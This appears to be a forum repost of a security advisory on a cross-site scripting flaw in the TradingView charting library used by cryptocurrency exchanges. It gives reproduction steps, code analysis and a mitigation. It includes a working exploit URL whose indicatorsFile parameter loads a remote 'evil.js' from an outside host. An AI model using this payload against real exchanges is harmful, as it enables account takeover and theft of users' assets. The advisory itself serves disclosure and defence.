Author

Topic: Recurrence, Analysis and Solution on TradingView XSS Vulnerability (Read 129 times)

newbie
Activity: 16
Merit: 0
Recently, a security platform exposed the high-risk vulnerability of TradingView. The security team of RatingToken from Cheetah Mobile Blockchain Security Center assisted multiple cooperative digital currency exchanges at the very first time, to test and repair the TradingView XSS vulnerability. The details are as follow:

Background:

TradingView, an open source and free Candlestick chart analysis tool, is widely used in digital currency and stock exchanges. XSS vulnerabilities can bypass the existing defense mechanism to compromise user accounts, or even arbitrarily transfer assets thereof.

Recurrence:

We found the vulnerability by testing the official website of an exchange.

Accessing https://www.***.com/assets/chart/charting_library/static, we traversed the directory and found where the vulnerability lies

https://cdn-images-1.medium.com/max/800/1*WpGF4q_0_sOaxpdWhmLzaQ.png

/charting_library/static/tv-chart.630b704a2b991e1354cb09.html (630b704a2b991e1354cb09 may change per different contexts) quotes

the script bundles/library.19c99ed5d03091e1354cb09.js (19c99ed5d03091e1354cb09 may change per different contexts)

https://cdn-images-1.medium.com/max/800/1*HF_Fau77r2wOKHc2nudBjw.png

Access

https://www.***.com/assets/chart/charting_library/static/tvchart.630b704a2b9d0eaf1593.html#disabledFeatures=[]&enabledFeatures= []&indicatorsFile=https://***/evil.js

we can see from the picture below that the .js script has been triggered.

https://cdn-images-1.medium.com/max/800/1*juRxoQFhQmOr8zLyI2-gRA.png

Analysis:

In the above recurrence verification, it can be seen that there must be three parameters: disabledFeatures, enabledFeatures and indicatorsFile.

https://cdn-images-1.medium.com/max/800/1*lfXxWjPUAAUz0Wq-JyLkuA.png

It can be seen in the code that the disabledFeatures and enabledFeatures parameters are of illegal formats, and therefore reported errors and stopped working.

While indicatorFile, the most critical parameter for the vulnerability, is used in the code as follows:

https://cdn-images-1.medium.com/max/800/1*edbiS4XlXfU28jqijaq8tg.png

$.getScript loads and executes a JavaScript file from the server via HTTP GET request.

If the victim clicks the constructed link as above, the remote malicious .js file passed by the attacker will be executed, which will result in compromised user accounts, malicious wallet operations and asset loss.

Defense plan

The temporary solution that users can take themselves is:

Disable indicatorsFile parameter in the .js file that starts with library under the bundles directory of the TradingView library.

RatingToken: https://ratingtoken.io/?from=medium





Jump to: